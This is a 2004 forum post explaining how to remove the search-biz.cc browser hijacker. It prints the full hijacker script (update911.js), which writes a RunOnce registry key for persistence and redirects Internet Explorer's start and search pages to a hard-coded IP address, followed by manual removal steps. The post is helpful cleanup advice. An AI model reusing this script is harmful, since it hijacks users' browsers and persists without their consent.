Thread: Help Please search-biz.cc
View Single Post
Old 02-28-2004, 09:48 PM   #12
wumpi
Enthusiast
wumpi knows what time it iswumpi knows what time it iswumpi knows what time it iswumpi knows what time it iswumpi knows what time it iswumpi knows what time it iswumpi knows what time it iswumpi knows what time it iswumpi knows what time it iswumpi knows what time it iswumpi knows what time it is
 
wumpi's Avatar
 
Posts: 37
Karma: 2358
Join Date: Feb 2003
Exclamation Solution
Heh, sounds cool. But be careful - if you email him, he might use your email for more spamming purposes.

Seriously, you must do the following:
A file called update911.js is placed in your WinNT or Windows directory

Content of the file:
Code:
var url = "http://81.211.105.9/index.php?v=1";
var burl = "http://81.211.105.9/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD")
It is called in the Windows registry;
1. Open Regedit Start/Run/regedit.exe
2. search for "update911.js" and delete the key(s)
2. search for "http://81.211.105.9/index.php?v=1" and delete the
key(s)
3. Delete the file update911.js in your windows folder

You can also find some info on Sophos's Anti-Virus page.

Wumpi
wumpi is offline   Reply With Quote